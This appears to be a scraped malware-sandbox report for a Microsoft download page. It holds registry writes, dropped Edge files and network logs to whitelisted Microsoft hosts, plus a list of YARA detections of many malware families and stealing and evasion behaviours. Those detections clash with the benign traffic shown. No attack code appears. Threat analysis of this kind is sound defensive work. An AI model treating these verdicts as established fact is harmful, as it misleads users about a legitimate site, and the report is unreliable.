Operation:	write	Name:	LogicalViewMode
Value: 1
(PID) Process:	(4628) MRT.exe	Key:	HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\Shell\Bags\119\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}
Operation:	write	Name:	FFlags
Value:

Add for printing

Executable files

Suspicious files

Text files

330

Unknown types

Dropped files

PID	Process	Filename		Type
7592	msedge.exe	C:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\ClientCertificates\LOG.old~RFfdf4b.TMP		—
		MD5:—	SHA256:—
7592	msedge.exe	C:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\ClientCertificates\LOG.old		—
		MD5:—	SHA256:—
7592	msedge.exe	C:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\discounts_db\LOG.old~RFfdf4b.TMP		—
		MD5:—	SHA256:—
7592	msedge.exe	C:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\discounts_db\LOG.old		—
		MD5:—	SHA256:—
7592	msedge.exe	C:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\commerce_subscription_db\LOG.old~RFfdf4b.TMP		—
		MD5:—	SHA256:—
7592	msedge.exe	C:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\commerce_subscription_db\LOG.old		—
		MD5:—	SHA256:—
7592	msedge.exe	C:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\PersistentOriginTrials\LOG.old~RFfdf4b.TMP		—
		MD5:—	SHA256:—
7592	msedge.exe	C:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\parcel_tracking_db\LOG.old~RFfdf4b.TMP		—
		MD5:—	SHA256:—
7592	msedge.exe	C:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\PersistentOriginTrials\LOG.old		—
		MD5:—	SHA256:—
7592	msedge.exe	C:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\parcel_tracking_db\LOG.old		—
		MD5:—	SHA256:—

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Add for printing

HTTP(S) requests

219

TCP/UDP connections

125

DNS requests

160

Threats

HTTP requests

PID	Process	Method	HTTP Code	IP	URL	CN	Type	Size	Reputation
7916	msedge.exe	GET	200	150.171.27.11:443	https://edge.microsoft.com/serviceexperimentation/v3/?osname=win&channel=stable&osver=10.0.19045&devicefamily=desktop&installdate=1661339457&clientversion=133.0.3065.92&experimentationmode=2&scpguard=0&scpfull=0&scpver=0	US	text	462 b	whitelisted
7916	msedge.exe	GET	200	23.59.18.102:443	https://www.microsoft.com/ja-jp/download/details.aspx?id=9905	US	html	128 Kb	whitelisted
7916	msedge.exe	GET	200	23.59.18.102:443	https://www.microsoft.com/echo/etc.clientlibs/cascade.component.authoring/clientlibs/clientlib-uhf.ACSHASHf9f2395c582fa601707b7a5dfae9f05f.min.css	US	text	406 b	whitelisted
7916	msedge.exe	GET	200	23.59.18.102:443	https://www.microsoft.com/onerfstatics/marketingsites-neu-prod/japanese/shell/_scrf/css/themes=default.device=uplevel_web_pc/63-57d110/c9-be0100/a6-e969ef/43-9f2e7c/82-8b5456/a0-5d3913/3d-28500e/ae-f1ac0c?ver=2.0&_cf=02242021_3231	US	text	128 Kb	whitelisted
7916	msedge.exe	GET	200	23.59.18.102:443	https://www.microsoft.com/echo/etc.clientlibs/cascade.component.authoring/clientlibs/clientlib-jquery.ACSHASH75d0cb3e9ff9fee40f5ce5fd93c17fb2.min.js	US	text	90.7 Kb	whitelisted
7916	msedge.exe	GET	200	23.59.18.102:443	https://www.microsoft.com/echo/etc.clientlibs/cascade.component.authoring/clientlibs/clientlib-jquery-cookie.ACSHASH5c75a4fa9fb3503322f8a0c9dd51512d.min.js	US	text	1.37 Kb	whitelisted
7916	msedge.exe	GET	200	2.16.204.161:443	https://www.bing.com/bloomfilterfiles/ExpandedDomainsFilterGlobal.json	NL	text	128 Kb	whitelisted
7916	msedge.exe	GET	200	88.221.169.152:443	https://c.s-microsoft.com/static/fonts/segoe-ui/west-european/Semibold/latest.woff2	US	binary	28.7 Kb	unknown
7916	msedge.exe	GET	200	88.221.169.152:443	https://c.s-microsoft.com/static/fonts/segoe-ui/west-european/normal/latest.woff2	US	binary	33.2 Kb	unknown
7916	msedge.exe	GET	200	104.102.45.22:443	https://uhf.microsoft.com/images/microsoft/RE1Mu3b.png	US	image	3.96 Kb	whitelisted

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID	Process	IP	Domain	ASN	CN	Reputation
4	System	192.168.100.255:137	—	Not routed	—	whitelisted
148	svchost.exe	40.127.240.158:443	settings-win.data.microsoft.com	MICROSOFT-CORP-MSN-AS-BLOCK	US	whitelisted
6768	MoUsoCoreWorker.exe	40.127.240.158:443	settings-win.data.microsoft.com	MICROSOFT-CORP-MSN-AS-BLOCK	US	whitelisted
6892	RUXIMICS.exe	40.127.240.158:443	settings-win.data.microsoft.com	MICROSOFT-CORP-MSN-AS-BLOCK	US	whitelisted
4	System	192.168.100.255:138	—	Not routed	—	whitelisted
7916	msedge.exe	150.171.27.11:80	edge.microsoft.com	MICROSOFT-CORP-MSN-AS-BLOCK	US	whitelisted
7916	msedge.exe	150.171.22.17:443	config.edge.skype.com	MICROSOFT-CORP-MSN-AS-BLOCK	US	whitelisted
7916	msedge.exe	23.59.18.102:443	www.microsoft.com	AKAMAI-AS	US	whitelisted
7916	msedge.exe	150.171.27.11:443	edge.microsoft.com	MICROSOFT-CORP-MSN-AS-BLOCK	US	whitelisted
7916	msedge.exe	104.18.22.222:443	copilot.microsoft.com	CLOUDFLARENET	US	whitelisted

DNS requests

Domain	IP	Reputation
settings-win.data.microsoft.com	40.127.240.158	whitelisted
google.com	142.250.185.142	whitelisted
edge.microsoft.com	150.171.27.11 150.171.28.11	whitelisted
config.edge.skype.com	150.171.22.17	whitelisted
www.microsoft.com	23.59.18.102	whitelisted
copilot.microsoft.com	104.18.22.222 104.18.23.222	whitelisted
www.bing.com	2.16.204.161 2.16.204.141 2.16.204.148 2.16.204.135 2.16.241.201 2.16.241.218	whitelisted
uhf.microsoft.com	104.102.45.22	whitelisted
rum.hlx.page	151.101.129.91 151.101.193.91 151.101.65.91 151.101.1.91	whitelisted
c.s-microsoft.com	88.221.169.152	whitelisted

Threats

PID	Process	Class	Message
—	—	Unknown Traffic	ET USER_AGENTS Microsoft Dr Watson User-Agent (MSDW)

Add for printing

No debug info

General Info

https://www.microsoft.com/ja-jp/download/details.aspx?id=9905

ACDF9772BD4B1AFFBCE69CE533F169F7

346A0915722F40E86C6CB6464CB45E4D9ABF8650

19B910DA840B51A3A2FDA4945AD291A65D61D71E65DA4FD94256B63A9352ED18

3:N8DSLZRtRxVazk2EIM/q9Q:2OLTDQEIK

Software environment set and analysis options

Launch configuration

Software preset

Hotfixes

Behavior activities

MALICIOUS

XORed URL has been found (YARA)

Actions looks like stealing of personal data

DCRAT has been detected (YARA)

LUMMA has been detected (YARA)

COBALTSTRIKE has been detected (YARA)

M0YV has been detected (YARA)

MASSLOGGER has been detected (YARA)

EMMENHTAL has been detected (YARA)

GOINJECTOR has been detected (YARA)

MIMIKATZ has been detected (YARA)

Steals Discord credentials and data (YARA)

ATLANTIDA has been detected (YARA)

MINT has been detected (YARA)

CVE-2022-30190 detected

XMRIG has been detected (YARA)

ASYNCRAT has been detected (YARA)

SUSPICIOUS

Executable content was dropped or overwritten

Found regular expressions for crypto-addresses (YARA)

The process verifies whether the antivirus software is installed

Possible usage of Discord/Telegram API has been detected (YARA)

The process checks if it is being run in the virtual environment

Multiple wallet extension IDs have been found

There is functionality for VM detection antiVM strings (YARA)

There is functionality for taking screenshot (YARA)

Searches for installed software

INFO

Application launched itself

Reads Environment values

Reads security settings of Internet Explorer

Reads the computer name

Checks supported languages

The sample compiled with english language support

Executable content was dropped or overwritten

Found Base64 encoded access to environment variables via PowerShell (YARA)

Found Base64 encoded network access via PowerShell (YARA)

Found Base64 encoded reflection usage via PowerShell (YARA)

Found Base64 encoded file access via PowerShell (YARA)

PECompact has been detected (YARA)

Themida protector has been detected

PyInstaller has been detected (YARA)

UPX packer has been detected

Checks proxy server information

Malware configuration

xor-url

ims-api

Static information

Video and screenshots

Processes

Behavior graph

Specs description

Process information

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Malware configuration

xor-url